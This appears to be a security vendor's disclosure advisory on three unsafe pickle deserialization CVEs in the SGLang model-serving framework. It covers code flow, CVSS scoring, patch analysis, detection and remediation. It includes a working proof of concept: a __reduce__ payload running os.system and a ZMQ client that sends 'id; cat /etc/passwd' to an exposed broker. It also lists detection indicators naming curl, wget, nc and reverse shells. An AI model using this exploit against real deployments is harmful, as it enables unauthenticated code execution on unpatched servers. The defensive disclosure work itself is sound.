The Orca Security Research Pod continuously investigates the security posture of widely adopted AI/ML infrastructure. During a focused audit of LLM serving frameworks, I discovered multiple unsafe deserialization vulnerabilities in SGLang, a popular open-source framework for serving large language models and multimodal AI models. These findings were coordinated through CERT/CC (case VU#665416), with additional analysis contributed by CERT/CC vulnerability researcher Christopher Cullen.

Three CVEs have been assigned: CVE-2026-3059, CVE-2026-3060, and CVE-2026-3989. The first two allow unauthenticated remote code execution against any SGLang deployment that exposes its multimodal generation or disaggregation features to the network. The third involves insecure deserialization in a crash dump replay utility. At the time of publication, the SGLang maintainers have not responded to coordinated disclosure efforts, and no official patch is available.

Quick Overview

| Attribute | CVE-2026-3059 | CVE-2026-3060 | CVE-2026-3989 |
| --- | --- | --- | --- |
| Component | Multimodal generation ZMQ broker (scheduler_client.py) | Disaggregation encoder receiver (encode_receiver.py) | Crash dump replay script (replay_request_dump.py) |
| CWE | CWE-502 (Deserialization of Untrusted Data) | CWE-502 (Deserialization of Untrusted Data) | CWE-502 (Deserialization of Untrusted Data) |
| CVSS 3.1 | 9.8 Critical | 9.8 Critical | 7.8 High |
| CVSS Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| Attack Vector | Network | Network | Local |
| Authentication | None | None | None |
| User Interaction | None | None | Required |
| Affected Versions | ≥ 0.5.5 through latest (0.5.9 at time of publication) | All versions with disaggregation module | All versions containing replay_request_dump.py |
| Fix Available | No | No | No |

CVSS Rationale

CVE-2026-3059 and CVE-2026-3060 score 9.8 because the vulnerable ZMQ sockets (the multimodal broker and the disaggregation encoder receiver) bind to all available network interfaces (tcp://*) by default with no authentication, and pickle.loads() runs immediately on any received payload. An attacker with network access to the exposed port needs nothing else: no credentials, no user interaction, no complex race conditions. The result is full code execution in the context of the SGLang process. This is a textbook unauthenticated network RCE.

Note: The 9.8 base score reflects severity when the affected feature is active. The multimodal generation and disaggregation modules must be explicitly enabled; default text-only SGLang deployments do not expose the vulnerable broker.

CVE-2026-3989 scores 7.8 High (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H). Once triggered, the impact matches the network RCEs (full arbitrary code execution), but the attack prerequisites are meaningfully different. The vulnerable code is a debugging utility in the scripts/playground/ directory, and exploitation requires an attacker to plant a malicious .pkl file where an operator will manually load it, either through write access to a crash dump directory or through social engineering. Its presence underscores how systemic unsafe pickle usage is throughout the SGLang codebase.
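As a sanity check on these numbers, each base score can be recomputed from its vector string. The sketch below implements the base-score equations from the CVSS v3.1 specification, but only for Scope: Unchanged (all three vectors here use S:U). The helper names are our own, and it is not an official calculator.

```python
import math

# CVSS v3.1 base-metric weights. The PR values are the Scope: Unchanged ones.
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value: float) -> float:
    """CVSS v3.1 Roundup: smallest number with one decimal place >= value.

    Works on an integer-scaled value to avoid floating-point artifacts,
    following the rounding procedure given in the specification.
    """
    int_input = round(value * 100_000)
    if int_input % 10_000 == 0:
        return int_input / 100_000.0
    return (math.floor(int_input / 10_000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Base score for a vector such as 'AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'."""
    metrics = dict(part.split(":", 1) for part in vector.split("/"))
    if metrics.get("S") != "U":
        raise NotImplementedError("this sketch only handles Scope: Unchanged")
    w = {name: WEIGHTS[name][metrics[name]] for name in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])  # impact sub-score base
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


print(base_score("AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"))  # 9.8 (CVE-2026-3059, CVE-2026-3060)
print(base_score("AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"))  # 7.8 (CVE-2026-3989)
```

The two vectors differ only in AV (N vs. L) and UI (N vs. R). That lowers the exploitability sub-score from about 3.89 to about 1.83, while the impact sub-score (about 5.87) is identical.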

What Is SGLang?

SGLang is an open-source serving framework developed by LMSYS for running large language models and multimodal AI models in production. It supports a wide range of popular models – including Qwen, DeepSeek, Mistral, and Skywork – and provides OpenAI-compatible API endpoints. SGLang is designed for high-throughput, low-latency inference and is used across research labs and production deployments. In most production environments, SGLang runs inside containerized GPU inference infrastructure – Kubernetes pods, Docker containers, or dedicated GPU nodes. Compromising an SGLang instance could expose model weights, inference data, API credentials, GPU workloads, and potentially provide a pivot point into the surrounding cluster environment.

Technical Analysis

Root Cause: Python’s pickle on Untrusted Network Data

All three vulnerabilities share a single root cause: the use of Python’s pickle module to deserialize data from untrusted sources.

Python’s own documentation explicitly warns that the pickle module is not secure and should never be used to deserialize untrusted data. The reason is fundamental to how pickle works – a pickle stream doesn’t just encode data, it encodes instructions for reconstructing Python objects. An attacker can craft a pickle payload whose reconstruction instructions include arbitrary function calls, achieving full code execution the moment pickle.loads() runs.

This is not a novel class of vulnerability. The same pattern has led to RCE in other ML serving frameworks, notably CVE-2024-9053 in vLLM and CVE-2025-10164 in a previous SGLang component. The persistence of pickle-based deserialization in ML tooling is a systemic problem, and SGLang’s codebase contains over 20 instances of pickle.loads() across different modules.

How Pickle Deserialization Becomes Code Execution

For readers less familiar with Python internals, it’s worth understanding why pickle.loads() on untrusted data is equivalent to eval().

When Python pickles an object, it stores instructions for how to rebuild that object later. These instructions include which callable to invoke and what arguments to pass. The __reduce__ method on a Python class controls this process – it tells pickle how to “reduce” an object to a reconstructable form. Critically, the callable specified in __reduce__ is not restricted to constructors. It can be any callable, including os.system, subprocess.Popen, or eval.

Here is the core of our proof-of-concept payload:

import os

class RCEPayload:
    def __init__(self, cmd):
        self.cmd = cmd

    def __reduce__(self):
        # Tell pickle to "rebuild" this object by calling os.system(cmd)
        return (os.system, (self.cmd,))

When pickle.loads() processes a serialized RCEPayload, it doesn't reconstruct an RCEPayload instance. Instead, it calls os.system(cmd), executing an arbitrary shell command. The pickle protocol faithfully follows the stored instructions with no sandboxing, no allowlisting, and no type checking.
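To see this without running a shell command, the sketch below keeps the same __reduce__ shape as RCEPayload but swaps os.system for eval on a harmless arithmetic expression (the class name Demo is ours). Unpickling never produces a Demo object; it returns whatever the chosen callable returns.

```python
import pickle


class Demo:
    """Same structure as RCEPayload, with a harmless callable and argument."""

    def __init__(self, expr: str):
        self.expr = expr

    def __reduce__(self):
        # pickle records "call builtins.eval(self.expr)" as the rebuild recipe
        return (eval, (self.expr,))


blob = pickle.dumps(Demo("6 * 7"))
result = pickle.loads(blob)  # eval("6 * 7") runs here, during deserialization
print(type(result).__name__, result)  # int 42
```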

The serialized payload is just bytes on the wire. There’s nothing in the pickle bytestream that distinguishes “safe data” from “malicious instruction.” From the ZMQ broker’s perspective, it receives bytes, calls pickle.loads(), and execution happens before any application-level validation could occur.
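The standard library's pickletools module can list the opcodes in a stream without executing it, which makes this concrete. In the sketch below (the helper name and the opcode set are our own choices), a payload shaped like the one above and an ordinary datetime object both contain the same import-and-call opcodes, STACK_GLOBAL and REDUCE, while a plain dict contains none. Legitimate pickles of class instances routinely carry these instructions, so inspecting the bytes cannot reliably separate data from attack.

```python
import datetime
import pickle
import pickletools

# Opcodes that make the unpickler look up a named object and/or call one.
CALLABLE_OPCODES = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "REDUCE", "NEWOBJ", "NEWOBJ_EX"}


def callable_opcodes(data: bytes) -> list[str]:
    """Return the import/call opcodes present in a pickle stream, without loading it."""
    found = {opcode.name for opcode, _arg, _pos in pickletools.genops(data)}
    return sorted(found & CALLABLE_OPCODES)


class Demo:
    def __reduce__(self):
        return (eval, ("6 * 7",))


print(callable_opcodes(pickle.dumps({"requests": []})))               # []
print(callable_opcodes(pickle.dumps(Demo())))                         # ['REDUCE', 'STACK_GLOBAL']
print(callable_opcodes(pickle.dumps(datetime.datetime(2026, 2, 4))))  # ['REDUCE', 'STACK_GLOBAL']
```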

CVE-2026-3059: Multimodal Generation Broker – Full Code Flow

To understand the attack surface, we need to trace the complete path from server startup to deserialization.

Step 1: Server Launch

When an operator starts SGLang’s diffusion server:

python -m sglang.multimodal_gen.runtime.launch_server \
    --model-path stabilityai/stable-diffusion-3-medium \
    --port 8000

The FastAPI application lifecycle hook automatically starts the ZMQ broker as a background task:

@asynccontextmanager
async def lifespan(app: FastAPI):
    # ...
    broker_task = asyncio.create_task(run_zeromq_broker(server_args))
    yield
    broker_task.cancel()

No separate flag is required: whenever the multimodal server is running, the broker is running too.

Step 2: Broker Binds to All Interfaces

The broker opens a ZeroMQ REP socket and binds to tcp://*:{broker_port}:

async def run_zeromq_broker(server_args: ServerArgs):
    ctx = zmq.asyncio.Context()
    socket = ctx.socket(zmq.REP)
    broker_endpoint = f"tcp://*:{server_args.broker_port}"  # ALL interfaces
    socket.bind(broker_endpoint)

The tcp://* binding means the broker listens on all available network interfaces – 127.0.0.1, the machine’s LAN IP, any public IP, and any container/pod network interface. The broker port defaults to http_port + 1. In the launch example above (--port 8000), the broker listens on port 8001. With SGLang’s default HTTP port of 30000, the broker would be on port 30001.

Although ServerArgs has a broker_host field, the vulnerable code ignores it and hardcodes the bind address to *.

Step 3: Direct Deserialization of Network Data

The broker’s main loop receives raw bytes and passes them directly to pickle.loads():

while True:
    try:
        payload = await socket.recv()
        request_batch = pickle.loads(payload)  # <-- RCE here
        logger.info("Broker received an offline job from a client.")
        response_batch = await async_scheduler_client.forward(request_batch)
        await socket.send(pickle.dumps(response_batch))
    except Exception as e:
        logger.error(f"Error in ZMQ Broker: {e}", exc_info=True)
        try:
            await socket.send(pickle.dumps({"status": "error", "message": str(e)}))
        except Exception:
            pass

There are zero security boundaries between socket.recv() and pickle.loads(). No authentication check. No message format validation. No source IP filtering. No TLS. The ZMQ REP socket accepts connections from any source, and the first thing the code does with the received bytes is deserialize them with pickle.

Note also that the exception handler catches the error after the payload has already been deserialized and executed – the except block cannot prevent the RCE, it only handles downstream errors.
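The ordering problem can be reproduced in a few lines. The sketch below is a simplified, hypothetical handler shaped like the broker loop: it deserializes first and validates afterwards (the isinstance check is our own stand-in for any application-level validation). The benign payload sets an environment variable whose name, PICKLE_DEMO_RAN, is chosen only for this example. The handler still reports a clean error, but the side effect has already happened.

```python
import os
import pickle


class SideEffect:
    """Benign stand-in for a malicious payload: sets an environment variable."""

    def __reduce__(self):
        return (eval, ("__import__('os').environ.setdefault('PICKLE_DEMO_RAN', '1')",))


def handle(payload: bytes) -> str:
    """Deserialize-then-validate, mirroring the order of the broker loop."""
    try:
        request_batch = pickle.loads(payload)  # the payload's callable runs here
        if not isinstance(request_batch, list):  # hypothetical validation, too late
            raise TypeError("expected a list of requests")
        return "ok"
    except Exception as e:
        return f"error: {e}"


print(handle(pickle.dumps(SideEffect())))  # error: expected a list of requests
print(os.environ.get("PICKLE_DEMO_RAN"))   # 1
```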

Step 4: Exploitation

From the attacker’s side, the exploit is minimal – a standard ZMQ REQ socket and a pickle payload:

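import pickle
import zmq

# target/port: the SGLang host and its broker port (http_port + 1 by default)
ctx = zmq.Context()
sock = ctx.socket(zmq.REQ)
sock.connect(f"tcp://{target}:{port}")

# RCEPayload is the class shown earlier
payload = pickle.dumps(RCEPayload("id; cat /etc/passwd"))
sock.send(payload)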

This is a single-message exploit. The attacker connects, sends one ZMQ message, and the command executes. The ZMQ REP/REQ pattern even sends a response back, confirming that the broker processed the message.

CVE-2026-3060: Disaggregation Encoder Receiver

The same pickle deserialization pattern exists in a completely separate component – SGLang’s encoder parallel disaggregation system in encode_receiver.py (lines 202 and 643).

This module is activated when a user passes the --encoder-transfer-backend zmq_to_scheduler flag, enabling ZMQ-based transfer between encoder and scheduler components. Like the multimodal broker, it binds a ZMQ socket to tcp://* and calls pickle.loads() on incoming payloads without authentication.

The attack mechanics are identical to CVE-2026-3059, but the code is maintained by a different team within the SGLang project (@ByronHsu, @hnyls2002, @ShangmingCai). This is worth noting because it means patches – if they ever arrive – may land on different timelines for the two components.

CVE-2026-3989: Crash Dump Replay Script

The replay_request_dump.py utility in scripts/playground/ loads .pkl files with pickle.load() and no validation:

def read_records(files):
    records = []
    for f in files:
        tmp = pickle.load(open(f, "rb"))
        if isinstance(tmp, dict) and "requests" in tmp:
            records.extend(tmp["requests"])
        else:
            records.extend(tmp)
    return records

The script is designed to replay crash dumps generated by SGLang when --crash-dump-folder is configured. Here’s the attack scenario in concrete terms:

  1. SGLang writes crash dump .pkl files to a configured directory (e.g., /data/sglang_crash_dump/).
  2. An attacker with write access to that directory – or who can supply a file via social engineering (“can you replay this crash dump for me?”) – drops a malicious .pkl file.
  3. The operator runs: python3 replay_request_dump.py --input-file /data/sglang_crash_dump/malicious.pkl
  4. pickle.load() executes the attacker’s payload.

The PoC for this CVE (developed by CERT/CC) uses a payload that returns a valid {'requests': []} structure after executing its code, so the script continues running normally – the operator may not even notice the execution:

class POC:
    def __reduce__(self):
        payload = (
            "(__import__('pathlib').Path('poc_marker.txt').write_text("
            "'pickle payload executed\\n', encoding='utf-8'), {'requests': []})[1]"
        )
        return (eval, (payload,))
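Until the script stops using pickle, one hardening option is the "Restricting Globals" pattern from the Python pickle documentation: subclass pickle.Unpickler and override find_class so that only explicitly allowlisted globals can be resolved. The sketch below is not part of SGLang, and its allowlist (plain built-in containers) is hypothetical. Real crash dumps likely contain SGLang request objects, each of which would need to be reviewed and added deliberately. With this loader, a payload shaped like the CERT/CC PoC fails at the lookup of builtins.eval, before anything is called.

```python
import io
import pickle

# Hypothetical allowlist: only plain built-in containers. Anything else,
# including builtins.eval, os.system, or subprocess.Popen, is refused.
ALLOWED_GLOBALS = {
    ("builtins", "dict"),
    ("builtins", "list"),
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("builtins", "tuple"),
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module: str, name: str):
        # Invoked for every global the stream references (GLOBAL/STACK_GLOBAL).
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def restricted_load(data: bytes):
    """Like pickle.loads(), but only allowlisted globals can be resolved."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

In read_records(), the pickle.load(open(f, "rb")) call would become RestrictedUnpickler(fh).load(), with fh opened in a with block so the file is also closed. This narrows the attack surface but is a hardening layer, not a substitute for moving off pickle.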

Proposed Patch Analysis

As part of the coordinated disclosure, CERT/CC vulnerability researcher Christopher Cullen developed a proposed patch with two changes:

Change 1: Localhost binding (effective)

# Original: binds to all interfaces
broker_endpoint = f"tcp://*:{server_args.broker_port}"

# Patched: binds to localhost by default
host = server_args.broker_host or "127.0.0.1"
broker_endpoint = f"tcp://{host}:{server_args.broker_port}"

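In the default configuration, this removes the network attack surface. Even though pickle deserialization remains, an attacker would need local access to the machine, or at least to its loopback interface (for example, from another container in the same Kubernetes pod, since containers in a pod share a network namespace). Operators who set broker_host to a routable address reintroduce the remote exposure.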

Change 2: msgpack serialization with pickle fallback (partial)

The patch introduces _pack() / _unpack() functions that prefer msgpack but fall back to pickle:

def _unpack(b: bytes) -> Any:
    try:
        return _from_basic(msgpack.unpackb(b, raw=False))
    except Exception:
        return pickle.loads(b)  # Fallback still vulnerable

This is a pragmatic transition mechanism: it lets existing pickle-speaking components keep working while new messages use msgpack. However, because the fallback triggers on any msgpack failure, an attacker does not need to craft anything special. An ordinary pickle stream fails msgpack parsing and falls straight through to pickle.loads().

With the localhost binding in place, this is a local-only risk and acceptable for a transitional fix. Without the localhost binding, the msgpack wrapper alone would not prevent remote exploitation.
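The difference between a fallback decoder and a strict one is easy to demonstrate. To keep the sketch dependency-free, it uses the standard library's json module as a stand-in for msgpack (an assumption: the real patch uses msgpack plus a _from_basic helper not shown here). unpack_with_fallback mirrors the structure of the proposed _unpack(); unpack_strict rejects anything the safe decoder cannot parse instead of handing it to pickle.

```python
import json
import pickle
from typing import Any


def unpack_with_fallback(b: bytes) -> Any:
    """Same shape as the proposed _unpack(): safe decoder first, pickle second."""
    try:
        return json.loads(b)
    except ValueError:  # JSONDecodeError and UnicodeDecodeError both subclass it
        return pickle.loads(b)  # every non-JSON message ends up here


def unpack_strict(b: bytes) -> Any:
    """Safe decoder only: unparseable input is an error, never a pickle."""
    try:
        return json.loads(b)
    except ValueError as exc:
        raise ValueError("rejected: message is not valid JSON") from exc


class Marker:
    """Benign payload that proves pickle.loads() was reached."""

    def __reduce__(self):
        return (eval, ("'reached pickle.loads'",))


blob = pickle.dumps(Marker())
print(unpack_with_fallback(blob))  # reached pickle.loads
```

A plain pickle needs no special crafting to reach the fallback: its first byte is not valid UTF-8, so the JSON decoder fails immediately. The strict variant is what a completed migration would look like.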

The synchronous SchedulerClient class also still uses send_pyobj() / recv_pyobj() (pyzmq's built-in pickle-based helpers), but these connect to internal scheduler endpoints rather than the exposed broker, which makes them lower priority.

Bottom line: Both changes together are effective as an immediate mitigation. The real fix is longer-term: replacing all 20+ pickle.loads() instances throughout the codebase with safe serialization, a significant engineering effort that the vendor would need to own.

Attack Flow (CVE-2026-3059 / CVE-2026-3060)

  1. The target runs SGLang with multimodal generation or disaggregation features enabled.
  2. The vulnerable ZMQ socket (the multimodal broker or the disaggregation encoder receiver) binds to tcp://*:{port}, making it reachable from the network.
  3. The attacker connects to the exposed port and sends a pickle payload containing a malicious __reduce__ method.
  4. SGLang calls pickle.loads() on the payload, triggering arbitrary code execution.
  5. The attacker has code execution with the full privileges of the SGLang process.

No authentication. No headers. No API keys. Just a raw TCP connection and a pickle bytestream.

Affected Versions

| Component | Introduced | Affected Range | Fixed Version |
| --- | --- | --- | --- |
| multimodal_gen (CVE-2026-3059) | Commit 7bc1dae09 (2025-11-05) | ≥ 0.5.5 through latest (0.5.9+) | None |
| Disaggregation module (CVE-2026-3060) | Present in all versions with ZMQ disaggregation | All versions with the feature | None |
| replay_request_dump.py (CVE-2026-3989) | Present since script creation | All versions | None |

Disclosure Timeline

| Date | Event |
| --- | --- |
| 2026-02-04 | Vulnerability discovered by Igor Stepansky (Orca Security) |
| 2026-02-04 | GitHub Security Advisory (GHSA-3cp7-c6q2-94xr) submitted to SGLang |
| 2026-02-04 | Report submitted to CERT/CC |
| 2026-02-09 | CERT/CC creates case VU#665416; vendor invited |
| 2026-02-09 | PoC files uploaded and validated |
| 2026-02-10 | CERT/CC confirms disclosure date of March 26, 2026 |
| 2026-02-17 | CERT/CC reaches out directly to SGLang maintainers; no response |
| 2026-02-23 | CVE-2026-3059 and CVE-2026-3060 assigned; CERT/CC indicates plans to contact CISA for additional assistance |
| 2026-03-02 | CERT/CC develops proposed patch (msgpack + localhost binding) |
| 2026-03-03 | GHSA-wxjp-55q2-vg27 opened with patch proposal |
| 2026-03-11 | CVE-2026-3989 identified by CERT/CC (Christopher Cullen); CVE assigned |

Despite multiple contact attempts through GitHub Security Advisories and direct email by CERT/CC – including outreach to CISA for assistance – the SGLang maintainers did not respond at any point during the coordination process. No vendor statement was obtained, and no official patch has been released.

Threat Status

Active Exploitation: No exploitation of these specific vulnerabilities has been observed in the wild at the time of publication.

PoC Availability: Functional proof-of-concept code for CVE-2026-3059 and CVE-2026-3060 exists and was shared with CERT/CC during coordination. A PoC for CVE-2026-3989 was developed by CERT/CC. Given the trivial nature of pickle deserialization exploits, weaponization requires minimal effort.

Important context: The multimodal generation and disaggregation features must be explicitly enabled for CVE-2026-3059 and CVE-2026-3060 to be exploitable. Default SGLang text-only inference deployments are not affected by these two CVEs. However, any deployment running multimodal_gen or disaggregation with ZMQ transport is immediately vulnerable if the broker port is network-reachable.

Detection Guidance

Network-level indicators for CVE-2026-3059 / CVE-2026-3060:

  • Monitor for unexpected inbound TCP connections to the ZMQ broker port (default: http_port + 1). ZMQ traffic on this port from external or untrusted source IPs is anomalous.
  • ZMQ uses a specific wire protocol – a ZMTP handshake followed by message frames. Network IDS signatures for ZMTP on unexpected ports can flag exposure.
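To check your own deployments for an exposed broker, a small probe can connect to the port and look for the ZMTP greeting signature. In ZMTP 3.x, this signature is 10 bytes: 0xFF, eight bytes of padding, then 0x7F. The sketch assumes that the listening ZMQ peer sends its signature as soon as the TCP connection is accepted. As far as we know this matches libzmq's behavior, but verify it against the versions you run. The default_broker_port helper encodes the http_port + 1 default described above; the other names are our own.

```python
import socket

SIGNATURE_LEN = 10  # ZMTP 3.x greeting signature: 0xFF, 8 padding bytes, 0x7F


def default_broker_port(http_port: int) -> int:
    """SGLang's default broker port, per the analysis above: http_port + 1."""
    return http_port + 1


def is_zmtp_signature(data: bytes) -> bool:
    """True if data begins with a ZMTP 3.x greeting signature."""
    return len(data) >= SIGNATURE_LEN and data[0] == 0xFF and data[9] == 0x7F


def probe_zmtp(host: str, port: int, timeout: float = 2.0) -> bool:
    """Connect to host:port and report whether the peer greets us with ZMTP.

    Sends nothing; only reads the first bytes the server volunteers.
    Connection errors and timeouts count as "not ZMTP".
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as conn:
            buf = b""
            while len(buf) < SIGNATURE_LEN:
                chunk = conn.recv(SIGNATURE_LEN - len(buf))
                if not chunk:  # peer closed before sending a full signature
                    break
                buf += chunk
            return is_zmtp_signature(buf)
    except OSError:  # covers refused connections and socket timeouts
        return False


# Hypothetical usage, run from outside the trusted network:
# probe_zmtp("sglang-host.example", default_broker_port(30000)) should be False.
```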

Host-level indicators:

  • Unexpected child processes spawned by the SGLang Python process (e.g., /bin/sh, curl, wget, nc).
  • File creation in unusual locations by the SGLang process (e.g., /tmp/pwned, reverse shell scripts).
  • Outbound connections from the SGLang process to unexpected destinations.

Remediation

Immediate actions:

  • Network segmentation. Ensure ZMQ broker ports (default: http_port + 1) are not exposed to untrusted networks. Use firewall rules to restrict access to localhost or known internal clients only.
  • Review deployment flags. If you are not using multimodal generation or disaggregation features, ensure they are not enabled.
  • Audit crash dump handling. Do not run replay_request_dump.py on .pkl files from untrusted sources or shared directories with weak permissions.
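For the crash dump item, a pre-flight check can at least refuse files that another local user could have written. The sketch below is POSIX-only, and its function name is our own. It opens the file once and runs its checks with os.fstat on that open descriptor, so the bytes it returns come from the same file that passed the checks. It does not help against a .pkl file handed over through social engineering, or one written by a compromised SGLang process running as the same user, so it complements rather than replaces refusing untrusted dumps.

```python
import os
import stat


def read_crash_dump_checked(path: str) -> bytes:
    """Return a crash dump's raw bytes only if no other local user could have written it.

    All checks use os.fstat() on the already-open descriptor, so the returned
    bytes come from the same file that was checked (no check-then-reopen race).
    POSIX-only: relies on os.getuid() and Unix permission bits.
    """
    with open(path, "rb") as fh:
        st = os.fstat(fh.fileno())
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError(f"{path}: not a regular file")
        if st.st_uid != os.getuid():
            raise PermissionError(f"{path}: owned by uid {st.st_uid}, not the current user")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            raise PermissionError(f"{path}: writable by group or other users")
        return fh.read()
```

Bytes that pass this check should still be deserialized with something stricter than a bare pickle.loads().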

Proposed Patch (Unmerged)

As detailed in the Patch Analysis section above, CERT/CC vulnerability researcher Christopher Cullen developed a proposed patch that binds the ZMQ broker to localhost by default and replaces pickle with msgpack serialization (with a transitional pickle fallback). This patch has been submitted to the SGLang maintainers via GitHub Security Advisory GHSA-wxjp-55q2-vg27 but has not been merged. Users may apply similar mitigations manually.

Long-Term Recommendation

SGLang’s codebase contains more than 20 instances of pickle.loads() and related unsafe deserialization calls. A comprehensive audit and migration to safe serialization formats (msgpack, JSON, or Protocol Buffers) is necessary to address the systemic risk.
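To illustrate what "safe serialization" means in practice, the sketch below decodes a JSON message into a dataclass and checks every field's exact type before constructing anything. The message name and fields (GenerationRequest, request_id, prompt, num_inference_steps) are hypothetical and do not reflect SGLang's real request schema. Unlike pickle, the decoder can only ever produce strings, numbers, lists, dicts, booleans, and None, and nothing in the message can name a function to call.

```python
import json
from dataclasses import asdict, dataclass, fields


@dataclass(frozen=True)
class GenerationRequest:
    # Hypothetical fields, for illustration only.
    request_id: str
    prompt: str
    num_inference_steps: int

    def to_json(self) -> bytes:
        return json.dumps(asdict(self)).encode("utf-8")

    @classmethod
    def from_json(cls, raw: bytes) -> "GenerationRequest":
        obj = json.loads(raw)  # raises ValueError on malformed input
        expected = {f.name: f.type for f in fields(cls)}
        if not isinstance(obj, dict) or set(obj) != set(expected):
            raise ValueError("unexpected message shape")
        for name, typ in expected.items():
            # Exact type match, so JSON true/false cannot pass as an int.
            if type(obj[name]) is not typ:
                raise ValueError(f"field {name!r} must be {typ.__name__}")
        return cls(**obj)


req = GenerationRequest("r1", "a watercolor fox", 28)
wire = req.to_json()
print(GenerationRequest.from_json(wire) == req)  # True
```

Anything outside the schema, including a pickle stream sent to the same port, is rejected with a ValueError instead of being executed.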

The Bigger Picture: Pickle in AI/ML Infrastructure

This is not an isolated finding. Unsafe pickle deserialization is arguably the most prevalent vulnerability class in the Python AI/ML ecosystem. The pattern repeats across model serving frameworks, training pipelines, model registries, and utility scripts.

The reason is understandable: pickle is convenient. It serializes arbitrary Python objects with zero schema definition. For fast-moving ML projects focused on model performance rather than security hardening, pickle is the path of least resistance. But that convenience comes at a cost – every pickle.loads() call on untrusted input is an implicit eval().

Organizations deploying open-source LLM serving infrastructure should audit their dependencies for pickle usage, restrict network access to internal communication endpoints, and treat any pickle deserialization of external data as a critical security boundary.

How Can Orca Help?

The Orca Platform secures AI as an evolution of its core capabilities for identifying, prioritizing, and remediating risk across cloud environments. With Orca, customers can:

  • inventory AI models, cloud-managed AI services, unmanaged apps, and other self-hosted AI frameworks
  • pinpoint where AI models and tools are running
  • detect sensitive data on the assets running AI projects, including training or fine-tuning datasets, as well as AI files
  • prioritize and remediate AI vulnerabilities and risks to AI workloads

To learn more or see the Orca Platform in action, schedule a personalized 1:1 demo.

Acknowledgments

Igor Stepansky (Orca Security) – vulnerability discovery, PoC development, and coordinated disclosure for CVE-2026-3059 and CVE-2026-3060

Christopher Cullen (CERT/CC) – coordination, patch development, CVE-2026-3989 discovery, and vulnerability note authoring

CERT/CC – case coordination (VU#665416)